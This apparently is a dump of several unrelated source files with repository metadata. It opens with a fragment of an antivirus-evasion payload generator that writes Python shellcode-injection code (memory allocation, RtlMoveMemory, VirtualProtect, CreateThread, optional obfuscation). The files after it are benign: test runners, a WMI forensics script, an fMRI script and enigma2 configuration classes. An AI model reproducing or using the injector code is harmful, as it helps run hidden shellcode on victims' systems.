payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| gpl-3.0 | -4,467,505,317,799,974,000 | 64.985507 | 336 | 0.613222 | false |
dbarsam/python-vsgen | tests/__main__.py | 1 | 2305 | # -*- coding: utf-8 -*-
"""
This module executes vsgen unittests (i.e. all tests in the current folder). It exists as an alternative to the command line interface::
> python -m unittest discover --start-directory . --pattern test*.py
For more testing options see the unittest documentation available at https://docs.python.org/3.5/library/unittest.html.
This module exposes an __main__ entry point useful for test development (usually from a Python IDE) and not recommended for normal test execution.
"""
import os
import sys
def main(argv=[]):
"""
Test main script
"""
import argparse
import unittest
parser = argparse.ArgumentParser(description='Executes the vsgen unit tests.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--testname', help='Specifies the test name to execute. This must be the fully qualified \'dotted\' path of the form \'package.module.class.function\' (e.g. \'tests.unit.test_feature.TestClass.test_function\'). If not provided all tests resolved from the internal test discovery process are executed.', action='append')
parser.add_argument('-f', '--testpattern', help='Specifies the test file pattern to execute during test discovery. If not provided all tests resolved from the internal test discovery process are executed.', default='test*.py')
parser.add_argument('-p', '--testpath', help='Specifies the test path for test discovery. If not provided, the internal test discovery uses the current directory.', default=os.path.dirname(os.path.realpath(__file__)))
args = parser.parse_args(argv[1:])
loader = unittest.TestLoader()
if args.testname:
testsuite = loader.loadTestsFromNames(args.testname)
else:
testsuite = loader.discover(args.testpath, args.testpattern)
runner = unittest.TextTestRunner(verbosity=2)
result = runner.run(testsuite)
return 0 if not result.failures and not result.errors else 1
if __name__ == '__main__':
# To use this package as an application we need to correct the sys.path
module_path = os.path.dirname(os.path.realpath(__file__))
package_path = os.path.normpath(os.path.join(module_path, '..'))
if package_path not in sys.path:
sys.path.append(package_path)
sys.exit(main(sys.argv))
| mit | 1,336,034,135,707,171,300 | 51.386364 | 351 | 0.71974 | false |
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/complete.py | 1 | 1949 | #! /usr/bin/env python
import vcsn
from test import *
# check complete algorithm
# ------------------------
def check(i, o):
if isinstance(i, str):
i = vcsn.automaton(i)
CHECK(not i.is_complete())
o = vcsn.automaton(o)
CHECK(o.is_complete())
CHECK_EQ(o, i.complete())
# Idempotence.
CHECK_EQ(o, o.complete())
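# A complete automaton has, for every state and every letter, at least one
# outgoing transition. complete() achieves this by adding a non-accepting
# sink state (state 3 in the first expected output below) that absorbs the
# missing letters.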
check('''
digraph
{
vcsn_context = "lal_char(abcd), b"
I -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
1 -> 2 [label = "c"]
2 -> F
}
''', '''
digraph
{
vcsn_context = "lal_char(abcd), b"
rankdir = LR
{
node [shape = point, width = 0]
I0
F2
}
{
node [shape = circle]
0
1
2
3 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
0 -> 3 [label = "c, d", color = DimGray]
1 -> 2 [label = "c"]
1 -> 3 [label = "a, b, d", color = DimGray]
2 -> F2
2 -> 3 [label = "a, b, c, d", color = DimGray]
3 -> 3 [label = "a, b, c, d", color = DimGray]
}
''')
# An automaton with an open context.
check(vcsn.b.expression('a').standard(), '''
digraph
{
vcsn_context = "letterset<char_letters(a)>, b"
rankdir = LR
edge [arrowhead = vee, arrowsize = .6]
{
node [shape = point, width = 0]
I0
F1
}
{
node [shape = circle, style = rounded, width = 0.5]
0
1
2 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
1 -> F1
1 -> 2 [label = "a", color = DimGray]
2 -> 2 [label = "a", color = DimGray]
}
''')
# An automaton without initial state.
check('''
digraph
{
vcsn_context = "lal_char(a), b"
0 -> 0 [label = "a"]
0 -> F0
}
''', '''
digraph
{
vcsn_context = "lal_char(a), b"
rankdir = LR
{
node [shape = point, width = 0]
I1
F0
}
{
node [shape = circle]
0 [color = DimGray]
1 [color = DimGray]
}
I1 -> 1 [color = DimGray]
0 -> F0 [color = DimGray]
0 -> 0 [label = "a", color = DimGray]
1 -> 1 [label = "a", color = DimGray]
}
''')
| gpl-3.0 | 1,662,478,737,304,644,900 | 16.247788 | 55 | 0.50077 | false |
fireeye/flare-wmi | python-cim/samples/show_CCM_RecentlyUsedApps.py | 1 | 2035 | import logging
from cim import CIM
from cim.objects import Namespace
def main(type_, path):
if type_ not in ("xp", "win7"):
raise RuntimeError("Invalid mapping type: {:s}".format(type_))
Values = ["FolderPath", "ExplorerFileName", "FileSize", "LastUserName", "LastUsedTime", "TimeZoneOffset",
"LaunchCount", "OriginalFileName", "FileDescription", "CompanyName", "ProductName", "ProductVersion",
"FileVersion", "AdditionalProductCodes", "msiVersion", "msiDisplayName", "ProductCode",
"SoftwarePropertiesHash", "ProductLanguage", "FilePropertiesHash", "msiPublisher"]
print("\t".join(Values))
c = CIM(type_, path)
try:
with Namespace(c, "root\\ccm\\SoftwareMeteringAgent") as ns:
for RUA in ns.class_("CCM_RecentlyUsedApps").instances:
RUAValues = []
for Value in Values:
try:
if Value == "LastUsedTime":
Time = str(RUA.properties[Value].value)
ExcelTime = "{}-{}-{} {}:{}:{}".format(Time[0:4], Time[4:6], Time[6:8], Time[8:10],
Time[10:12], Time[12:14])
RUAValues.append(ExcelTime)
elif Value == "TimeZoneOffset":
Time = str(RUA.properties[Value].value)
TimeOffset = '="{}"'.format(Time[-4:])
RUAValues.append(TimeOffset)
else:
RUAValues.append(str(RUA.properties[Value].value))
except KeyError:
RUAValues.append("")
print("\t".join(RUAValues))
except IndexError:
raise RuntimeError("CCM Software Metering Agent path 'root\\\\ccm\\\\SoftwareMeteringAgent' not found.")
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import sys
main(*sys.argv[1:])
| apache-2.0 | -777,082,851,250,680,000 | 43.23913 | 115 | 0.519902 | false |
poldrack/openfmri | openfmri_paper/2.8_make_allmean_file.py | 1 | 1497 | """
make a list of all contrasts/tasks
"""
import pickle
from get_contrasts_to_use import *
c=get_contrasts_to_use()
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
infodir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
f=open(os.path.join(infodir,'task_keys.pkl'),'rb')
task_keys=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_contrasts.pkl'),'rb')
contrasts=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_conditions.pkl'),'rb')
condition_keys=pickle.load(f)
f.close()
taskctr={'ds001': {1: 1},
'ds002': {1: 2, 2: 3, 3: 4},
'ds003': {1: 5},
'ds005': {1: 6},
'ds006A': {1: 7},
'ds007': {1: 8, 2: 9, 3: 10},
'ds008': {1: 11, 2: 12},
'ds011': {1: 13, 2: 14, 3: 15, 4: 16},
'ds017': {2: 17},
'ds051': {1: 18},
'ds052': {1: 19, 2: 20},
'ds101': {1: 21},
'ds102': {1: 22},
'ds107': {1: 23}}
taskdict={}
for ds in taskctr.iterkeys():
for t in taskctr[ds].iterkeys():
taskdict[taskctr[ds][t]]=[ds,t,task_keys[ds]['task%03d'%t],c[ds][t][0],contrasts[ds]['task%03d'%t]['contrasts'][c[ds][t][0]]]
meanzstatdir='/corral-repl/utexas/poldracklab/openfmri/shared2/mean_zstat/'
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
cmd='fslmerge -t %s/all_mean_zstat.nii.gz'%outdir
for t in range(1,24):
cmd += ' %s/mean_%s_task%03d_zstat%d_run1.nii.gz'%(meanzstatdir,taskdict[t][0],taskdict[t][1],taskdict[t][3])
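# Illustrative result (zstat numbers come from the contrast table above):
#   fslmerge -t <outdir>/all_mean_zstat.nii.gz <meanzstatdir>/mean_ds001_task001_zstat<N>_run1.nii.gz ... (23 volumes)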
print cmd
| bsd-2-clause | -8,475,441,843,590,455,000 | 27.245283 | 133 | 0.651971 | false |
vitmod/enigma2-1 | lib/python/Components/config.py | 1 | 53976 | from enigma import getPrevAsciiCode
from Tools.NumericalTextInput import NumericalTextInput
from Tools.Directories import resolveFilename, SCOPE_CONFIG, fileExists
from Components.Harddisk import harddiskmanager
from copy import copy as copy_copy
from os import path as os_path
from time import localtime, strftime
# ConfigElement, the base class of all ConfigElements.
# it stores:
# value the current value, usefully encoded.
# usually a property which retrieves _value,
# and maybe does some reformatting
# _value the value as it's going to be saved in the configfile,
# though still in non-string form.
# this is the object which is actually worked on.
# default the initial value. If _value is equal to default,
# it will not be stored in the config file
# saved_value is a text representation of _value, stored in the config file
#
# and has (at least) the following methods:
# save() stores _value into saved_value,
# (or stores 'None' if it should not be stored)
# load() loads _value from saved_value, or loads
# the default if saved_value is 'None' (default)
# or invalid.
#
class ConfigElement(object):
def __init__(self):
self.extra_args = {}
self.saved_value = None
self.save_forced = False
self.last_value = None
self.save_disabled = False
self.__notifiers = None
self.__notifiers_final = None
self.enabled = True
self.callNotifiersOnSaveAndCancel = False
def getNotifiers(self):
if self.__notifiers is None:
self.__notifiers = [ ]
return self.__notifiers
def setNotifiers(self, val):
self.__notifiers = val
notifiers = property(getNotifiers, setNotifiers)
def getNotifiersFinal(self):
if self.__notifiers_final is None:
self.__notifiers_final = [ ]
return self.__notifiers_final
def setNotifiersFinal(self, val):
self.__notifiers_final = val
notifiers_final = property(getNotifiersFinal, setNotifiersFinal)
# you need to override this to do input validation
def setValue(self, value):
self._value = value
self.changed()
def getValue(self):
return self._value
value = property(getValue, setValue)
# you need to override this if self.value is not a string
def fromstring(self, value):
return value
	# you can override this for fancy default handling
def load(self):
sv = self.saved_value
if sv is None:
self.value = self.default
else:
self.value = self.fromstring(sv)
	# you need to override this if str(self.value) doesn't work
	def tostring(self, value):
		return str(value)
	def save(self):
if self.save_disabled or (self.value == self.default and not self.save_forced):
self.saved_value = None
else:
self.saved_value = self.tostring(self.value)
if self.callNotifiersOnSaveAndCancel:
self.changed()
def cancel(self):
self.load()
if self.callNotifiersOnSaveAndCancel:
self.changed()
def isChanged(self):
sv = self.saved_value
if sv is None and self.value == self.default:
return False
return self.tostring(self.value) != sv
def changed(self):
if self.__notifiers:
for x in self.notifiers:
try:
if self.extra_args[x]:
x(self, self.extra_args[x])
else:
x(self)
except:
x(self)
def changedFinal(self):
if self.__notifiers_final:
for x in self.notifiers_final:
try:
if self.extra_args[x]:
x(self, self.extra_args[x])
else:
x(self)
except:
x(self)
def addNotifier(self, notifier, initial_call = True, immediate_feedback = True, extra_args=None):
if not extra_args: extra_args = []
assert callable(notifier), "notifiers must be callable"
try:
self.extra_args[notifier] = extra_args
except: pass
if immediate_feedback:
self.notifiers.append(notifier)
else:
self.notifiers_final.append(notifier)
# CHECKME:
# do we want to call the notifier
# - at all when adding it? (yes, though optional)
# - when the default is active? (yes)
# - when no value *yet* has been set,
# because no config has ever been read (currently yes)
# (though that's not so easy to detect.
# the entry could just be new.)
if initial_call:
if extra_args:
notifier(self,extra_args)
else:
notifier(self)
def removeNotifier(self, notifier):
notifier in self.notifiers and self.notifiers.remove(notifier)
notifier in self.notifiers_final and self.notifiers_final.remove(notifier)
def disableSave(self):
self.save_disabled = True
def __call__(self, selected):
return self.getMulti(selected)
def onSelect(self, session):
pass
def onDeselect(self, session):
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
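# --- Illustrative sketch (not part of the original module) ---
# A minimal ConfigElement subclass showing the value/saved_value round trip
# described in the header comment; the class name _ConfigDemoText is made up.
class _ConfigDemoText(ConfigElement):
	def __init__(self, default = ""):
		ConfigElement.__init__(self)
		self.default = self.value = self.last_value = default
# usage sketch (assumes no GUI/session is required):
#   c = _ConfigDemoText(default = "abc")
#   c.value = "xyz"; c.save()   # saved_value == "xyz"
#   c.value = "abc"; c.save()   # saved_value is None: defaults are not stored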
KEY_LEFT = 0
KEY_RIGHT = 1
KEY_OK = 2
KEY_DELETE = 3
KEY_BACKSPACE = 4
KEY_HOME = 5
KEY_END = 6
KEY_TOGGLEOW = 7
KEY_ASCII = 8
KEY_TIMEOUT = 9
KEY_NUMBERS = range(12, 12+10)
KEY_0 = 12
KEY_9 = 12+9
def getKeyNumber(key):
assert key in KEY_NUMBERS
return key - KEY_0
class choicesList(object): # XXX: we might want a better name for this
LIST_TYPE_LIST = 1
LIST_TYPE_DICT = 2
def __init__(self, choices, type = None):
self.choices = choices
if type is None:
if isinstance(choices, list):
self.type = choicesList.LIST_TYPE_LIST
elif isinstance(choices, dict):
self.type = choicesList.LIST_TYPE_DICT
else:
assert False, "choices must be dict or list!"
else:
self.type = type
def __list__(self):
if self.type == choicesList.LIST_TYPE_LIST:
ret = [not isinstance(x, tuple) and x or x[0] for x in self.choices]
else:
ret = self.choices.keys()
return ret or [""]
def __iter__(self):
if self.type == choicesList.LIST_TYPE_LIST:
ret = [not isinstance(x, tuple) and x or x[0] for x in self.choices]
else:
ret = self.choices
return iter(ret or [""])
def __len__(self):
return len(self.choices) or 1
def __getitem__(self, index):
if self.type == choicesList.LIST_TYPE_LIST:
ret = self.choices[index]
if isinstance(ret, tuple):
ret = ret[0]
return ret
return self.choices.keys()[index]
def index(self, value):
try:
return self.__list__().index(value)
except (ValueError, IndexError):
# occurs e.g. when default is not in list
return 0
def __setitem__(self, index, value):
if self.type == choicesList.LIST_TYPE_LIST:
orig = self.choices[index]
if isinstance(orig, tuple):
self.choices[index] = (value, orig[1])
else:
self.choices[index] = value
else:
key = self.choices.keys()[index]
orig = self.choices[key]
del self.choices[key]
self.choices[value] = orig
def default(self):
choices = self.choices
if not choices:
return ""
if self.type is choicesList.LIST_TYPE_LIST:
default = choices[0]
if isinstance(default, tuple):
default = default[0]
else:
default = choices.keys()[0]
return default
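# Illustrative behaviour (hypothetical data): choicesList([("a", "Apple"), "b"])
# iterates over the ids ["a", "b"], while descriptionList over the same data
# yields the descriptions ["Apple", "b"] (an id without a tuple describes itself).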
class descriptionList(choicesList): # XXX: we might want a better name for this
def __list__(self):
if self.type == choicesList.LIST_TYPE_LIST:
ret = [not isinstance(x, tuple) and x or x[1] for x in self.choices]
else:
ret = self.choices.values()
return ret or [""]
def __iter__(self):
return iter(self.__list__())
def __getitem__(self, index):
if self.type == choicesList.LIST_TYPE_LIST:
for x in self.choices:
if isinstance(x, tuple):
if x[0] == index:
return str(x[1])
elif x == index:
return str(x)
return str(index) # Fallback!
else:
return str(self.choices.get(index, ""))
def __setitem__(self, index, value):
if self.type == choicesList.LIST_TYPE_LIST:
i = self.index(index)
orig = self.choices[i]
if isinstance(orig, tuple):
self.choices[i] = (orig[0], value)
else:
self.choices[i] = value
else:
self.choices[index] = value
#
# ConfigSelection is a "one of.."-type.
# it has the "choices", usually a list, which contains
# (id, desc)-tuples (or just only the ids, in case the id
# will be used as description)
#
# all ids MUST be plain strings.
#
class ConfigSelection(ConfigElement):
def __init__(self, choices, default = None):
ConfigElement.__init__(self)
self.choices = choicesList(choices)
if default is None:
default = self.choices.default()
self._descr = None
self.default = self._value = self.last_value = default
def setChoices(self, choices, default = None):
self.choices = choicesList(choices)
if default is None:
default = self.choices.default()
self.default = default
if self.value not in self.choices:
self.value = default
def setValue(self, value):
if value in self.choices:
self._value = value
else:
self._value = self.default
self._descr = None
self.changed()
def tostring(self, val):
return val
def getValue(self):
return self._value
def setCurrentText(self, text):
i = self.choices.index(self.value)
self.choices[i] = text
self._descr = self.description[text] = text
self._value = text
value = property(getValue, setValue)
def getIndex(self):
return self.choices.index(self.value)
index = property(getIndex)
# GUI
def handleKey(self, key):
nchoices = len(self.choices)
if nchoices > 1:
i = self.choices.index(self.value)
if key == KEY_LEFT:
self.value = self.choices[(i + nchoices - 1) % nchoices]
elif key == KEY_RIGHT:
self.value = self.choices[(i + 1) % nchoices]
elif key == KEY_HOME:
self.value = self.choices[0]
elif key == KEY_END:
self.value = self.choices[nchoices - 1]
def selectNext(self):
nchoices = len(self.choices)
i = self.choices.index(self.value)
self.value = self.choices[(i + 1) % nchoices]
def getText(self):
if self._descr is not None:
return self._descr
descr = self._descr = self.description[self.value]
if descr:
return _(descr)
return descr
def getMulti(self, selected):
if self._descr is not None:
descr = self._descr
else:
descr = self._descr = self.description[self.value]
if descr:
return "text", _(descr)
return "text", descr
# HTML
def getHTML(self, id):
res = ""
for v in self.choices:
descr = self.description[v]
if self.value == v:
checked = 'checked="checked" '
else:
checked = ''
			res += '<input type="radio" name="' + id + '" ' + checked + 'value="' + v + '">' + descr + "<br>\n"
return res
def unsafeAssign(self, value):
# setValue does check if value is in choices. This is safe enough.
self.value = value
description = property(lambda self: descriptionList(self.choices.choices, self.choices.type))
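# A minimal usage sketch (illustrative only, not part of the original file):
# both plain ids and (id, description)-tuples are accepted as choices, and
# setValue() silently falls back to the default for unknown ids.
#
#	choice = ConfigSelection(choices=[("auto", _("automatic")), ("manual", _("manual"))], default="auto")
#	choice.value = "manual"
#	print choice.getText()	# prints the (translated) description of the current id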
# a binary decision.
#
# several customized versions exist for different
# descriptions.
#
boolean_descriptions = {False: _("false"), True: _("true")}
class ConfigBoolean(ConfigElement):
def __init__(self, default = False, descriptions = boolean_descriptions):
ConfigElement.__init__(self)
self.descriptions = descriptions
self.value = self.last_value = self.default = default
def handleKey(self, key):
if key in (KEY_LEFT, KEY_RIGHT):
self.value = not self.value
elif key == KEY_HOME:
self.value = False
elif key == KEY_END:
self.value = True
def getText(self):
descr = self.descriptions[self.value]
if descr:
return _(descr)
return descr
def getMulti(self, selected):
descr = self.descriptions[self.value]
if descr:
return "text", _(descr)
return "text", descr
def tostring(self, value):
if not value:
return "false"
else:
return "true"
def fromstring(self, val):
if val == "true":
return True
else:
return False
def getHTML(self, id):
if self.value:
checked = ' checked="checked"'
else:
checked = ''
return '<input type="checkbox" name="' + id + '" value="1" ' + checked + " />"
	# this is FLAWED and must be fixed.
def unsafeAssign(self, value):
if value == "1":
self.value = True
else:
self.value = False
def onDeselect(self, session):
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
yes_no_descriptions = {False: _("no"), True: _("yes")}
class ConfigYesNo(ConfigBoolean):
def __init__(self, default = False):
ConfigBoolean.__init__(self, default = default, descriptions = yes_no_descriptions)
on_off_descriptions = {False: _("off"), True: _("on")}
class ConfigOnOff(ConfigBoolean):
def __init__(self, default = False):
ConfigBoolean.__init__(self, default = default, descriptions = on_off_descriptions)
enable_disable_descriptions = {False: _("disable"), True: _("enable")}
class ConfigEnableDisable(ConfigBoolean):
def __init__(self, default = False):
ConfigBoolean.__init__(self, default = default, descriptions = enable_disable_descriptions)
class ConfigDateTime(ConfigElement):
def __init__(self, default, formatstring, increment = 86400):
ConfigElement.__init__(self)
self.increment = increment
self.formatstring = formatstring
self.value = self.last_value = self.default = int(default)
def handleKey(self, key):
if key == KEY_LEFT:
self.value -= self.increment
elif key == KEY_RIGHT:
self.value += self.increment
elif key == KEY_HOME or key == KEY_END:
self.value = self.default
def getText(self):
return strftime(self.formatstring, localtime(self.value))
def getMulti(self, selected):
return "text", strftime(self.formatstring, localtime(self.value))
def fromstring(self, val):
return int(val)
# *THE* mighty config element class
#
# allows you to store/edit a sequence of values.
# can be used for IP-addresses, dates, plain integers, ...
# several helpers exist to ease this a bit.
#
class ConfigSequence(ConfigElement):
def __init__(self, seperator, limits, default, censor_char = ""):
ConfigElement.__init__(self)
assert isinstance(limits, list) and len(limits[0]) == 2, "limits must be [(min, max),...]-tuple-list"
assert censor_char == "" or len(censor_char) == 1, "censor char must be a single char (or \"\")"
#assert isinstance(default, list), "default must be a list"
#assert isinstance(default[0], int), "list must contain numbers"
#assert len(default) == len(limits), "length must match"
self.marked_pos = 0
self.seperator = seperator
self.limits = limits
self.censor_char = censor_char
self.last_value = self.default = default
self.value = copy_copy(default)
self.endNotifier = None
def validate(self):
max_pos = 0
num = 0
for i in self._value:
max_pos += len(str(self.limits[num][1]))
if self._value[num] < self.limits[num][0]:
self._value[num] = self.limits[num][0]
if self._value[num] > self.limits[num][1]:
self._value[num] = self.limits[num][1]
num += 1
if self.marked_pos >= max_pos:
if self.endNotifier:
for x in self.endNotifier:
x(self)
self.marked_pos = max_pos - 1
if self.marked_pos < 0:
self.marked_pos = 0
def validatePos(self):
if self.marked_pos < 0:
self.marked_pos = 0
total_len = sum([len(str(x[1])) for x in self.limits])
if self.marked_pos >= total_len:
self.marked_pos = total_len - 1
def addEndNotifier(self, notifier):
if self.endNotifier is None:
self.endNotifier = []
self.endNotifier.append(notifier)
def handleKey(self, key):
if key == KEY_LEFT:
self.marked_pos -= 1
self.validatePos()
elif key == KEY_RIGHT:
self.marked_pos += 1
self.validatePos()
elif key == KEY_HOME:
self.marked_pos = 0
self.validatePos()
elif key == KEY_END:
max_pos = 0
num = 0
for i in self._value:
max_pos += len(str(self.limits[num][1]))
num += 1
self.marked_pos = max_pos - 1
self.validatePos()
elif key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
code = getPrevAsciiCode()
if code < 48 or code > 57:
return
number = code - 48
else:
number = getKeyNumber(key)
block_len = [len(str(x[1])) for x in self.limits]
total_len = sum(block_len)
pos = 0
blocknumber = 0
block_len_total = [0, ]
for x in block_len:
pos += block_len[blocknumber]
block_len_total.append(pos)
if pos - 1 >= self.marked_pos:
pass
else:
blocknumber += 1
# length of numberblock
number_len = len(str(self.limits[blocknumber][1]))
# position in the block
posinblock = self.marked_pos - block_len_total[blocknumber]
oldvalue = self._value[blocknumber]
olddec = oldvalue % 10 ** (number_len - posinblock) - (oldvalue % 10 ** (number_len - posinblock - 1))
newvalue = oldvalue - olddec + (10 ** (number_len - posinblock - 1) * number)
self._value[blocknumber] = newvalue
self.marked_pos += 1
self.validate()
self.changed()
def genText(self):
value = ""
mPos = self.marked_pos
num = 0
for i in self._value:
			if value: # FIXME: no leading separator possible
value += self.seperator
if mPos >= len(value) - 1:
mPos += 1
if self.censor_char == "":
value += ("%0" + str(len(str(self.limits[num][1]))) + "d") % i
else:
value += (self.censor_char * len(str(self.limits[num][1])))
num += 1
return value, mPos
def getText(self):
(value, mPos) = self.genText()
return value
def getMulti(self, selected):
(value, mPos) = self.genText()
# only mark cursor when we are selected
# (this code is heavily ink optimized!)
if self.enabled:
return "mtext"[1-selected:], value, [mPos]
else:
return "text", value
def tostring(self, val):
return self.seperator.join([self.saveSingle(x) for x in val])
def saveSingle(self, v):
return str(v)
def fromstring(self, value):
return [int(x) for x in value.split(self.seperator)]
def onDeselect(self, session):
if self.last_value != self._value:
self.changedFinal()
self.last_value = copy_copy(self._value)
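# A small illustrative sketch (not from the original file): each block of the
# sequence gets one (min, max)-limit tuple, and the blocks are joined by the
# seperator when rendered or serialized.
#
#	date = ConfigSequence(seperator=".", limits=[(1, 31), (1, 12), (2000, 2099)], default=[1, 1, 2015])
#	date.tostring(date.value)	# -> "1.1.2015"; fromstring() splits it back into blocks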
ip_limits = [(0,255),(0,255),(0,255),(0,255)]
class ConfigIP(ConfigSequence):
def __init__(self, default, auto_jump = False):
ConfigSequence.__init__(self, seperator = ".", limits = ip_limits, default = default)
self.block_len = [len(str(x[1])) for x in self.limits]
self.marked_block = 0
self.overwrite = True
self.auto_jump = auto_jump
def handleKey(self, key):
if key == KEY_LEFT:
if self.marked_block > 0:
self.marked_block -= 1
self.overwrite = True
elif key == KEY_RIGHT:
if self.marked_block < len(self.limits)-1:
self.marked_block += 1
self.overwrite = True
elif key == KEY_HOME:
self.marked_block = 0
self.overwrite = True
elif key == KEY_END:
self.marked_block = len(self.limits)-1
self.overwrite = True
elif key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
code = getPrevAsciiCode()
if code < 48 or code > 57:
return
number = code - 48
else:
number = getKeyNumber(key)
oldvalue = self._value[self.marked_block]
if self.overwrite:
self._value[self.marked_block] = number
self.overwrite = False
else:
oldvalue *= 10
newvalue = oldvalue + number
if self.auto_jump and newvalue > self.limits[self.marked_block][1] and self.marked_block < len(self.limits)-1:
self.handleKey(KEY_RIGHT)
self.handleKey(key)
return
else:
self._value[self.marked_block] = newvalue
if len(str(self._value[self.marked_block])) >= self.block_len[self.marked_block]:
self.handleKey(KEY_RIGHT)
self.validate()
self.changed()
def genText(self):
value = ""
block_strlen = []
for i in self._value:
block_strlen.append(len(str(i)))
if value:
value += self.seperator
value += str(i)
leftPos = sum(block_strlen[:self.marked_block])+self.marked_block
rightPos = sum(block_strlen[:(self.marked_block+1)])+self.marked_block
mBlock = range(leftPos, rightPos)
return value, mBlock
def getMulti(self, selected):
(value, mBlock) = self.genText()
if self.enabled:
return "mtext"[1-selected:], value, mBlock
else:
return "text", value
def getHTML(self, id):
# we definitely don't want leading zeros
return '.'.join(["%d" % d for d in self.value])
mac_limits = [(1,255),(1,255),(1,255),(1,255),(1,255),(1,255)]
class ConfigMAC(ConfigSequence):
def __init__(self, default):
ConfigSequence.__init__(self, seperator = ":", limits = mac_limits, default = default)
class ConfigMacText(ConfigElement, NumericalTextInput):
def __init__(self, default = "", visible_width = False):
ConfigElement.__init__(self)
NumericalTextInput.__init__(self, nextFunc = self.nextFunc, handleTimeout = False)
self.marked_pos = 0
self.allmarked = (default != "")
self.fixed_size = 17
self.visible_width = visible_width
self.offset = 0
		self.overwrite = True  # a MAC address is fixed-size, so typed digits always overwrite
self.help_window = None
self.value = self.last_value = self.default = default
self.useableChars = '0123456789ABCDEF'
def validateMarker(self):
textlen = len(self.text)
if self.marked_pos > textlen-1:
self.marked_pos = textlen-1
elif self.marked_pos < 0:
self.marked_pos = 0
def insertChar(self, ch, pos, owr):
if self.text[pos] == ':':
pos += 1
if owr or self.overwrite:
self.text = self.text[0:pos] + ch + self.text[pos + 1:]
elif self.fixed_size:
self.text = self.text[0:pos] + ch + self.text[pos:-1]
else:
self.text = self.text[0:pos] + ch + self.text[pos:]
def handleKey(self, key):
if key == KEY_LEFT:
self.timeout()
if self.allmarked:
self.marked_pos = len(self.text)
self.allmarked = False
else:
if self.text[self.marked_pos-1] == ':':
self.marked_pos -= 2
else:
self.marked_pos -= 1
elif key == KEY_RIGHT:
self.timeout()
if self.allmarked:
self.marked_pos = 0
self.allmarked = False
else:
if self.marked_pos < (len(self.text)-1):
if self.text[self.marked_pos+1] == ':':
self.marked_pos += 2
else:
self.marked_pos += 1
elif key in KEY_NUMBERS:
owr = self.lastKey == getKeyNumber(key)
newChar = self.getKey(getKeyNumber(key))
self.insertChar(newChar, self.marked_pos, owr)
elif key == KEY_TIMEOUT:
self.timeout()
if self.help_window:
self.help_window.update(self)
if self.text[self.marked_pos] == ':':
self.marked_pos += 1
return
if self.help_window:
self.help_window.update(self)
self.validateMarker()
self.changed()
def nextFunc(self):
self.marked_pos += 1
self.validateMarker()
self.changed()
def getValue(self):
try:
return self.text.encode("utf-8")
except UnicodeDecodeError:
print "Broken UTF8!"
return self.text
def setValue(self, val):
try:
self.text = val.decode("utf-8")
except UnicodeDecodeError:
self.text = val.decode("utf-8", "ignore")
print "Broken UTF8!"
value = property(getValue, setValue)
_value = property(getValue, setValue)
def getText(self):
return self.text.encode("utf-8")
def getMulti(self, selected):
if self.visible_width:
if self.allmarked:
mark = range(0, min(self.visible_width, len(self.text)))
else:
mark = [self.marked_pos-self.offset]
